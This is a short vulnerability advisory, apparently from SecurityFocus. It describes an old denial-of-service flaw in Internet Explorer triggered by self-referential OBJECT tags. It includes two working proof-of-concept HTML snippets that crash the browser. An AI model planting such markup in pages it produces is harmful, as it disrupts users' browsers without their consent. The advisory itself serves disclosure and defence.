source: https://www.securityfocus.com/bid/4564/info
Microsoft Internet Explorer is vulnerable to a denial of service due to an error in handling certain self-referential <OBJECT> definitions in HTML documents. This occurs when an object of type "text/html" is specified, with the DATA field referencing the name of the HTML document in which it is defined. Other circumstances may also trigger this condition.
Create a file named "CRASH.HTM" with the following line in it:
<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>
The following example was also submitted by Ryan Emerle:
<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT></object>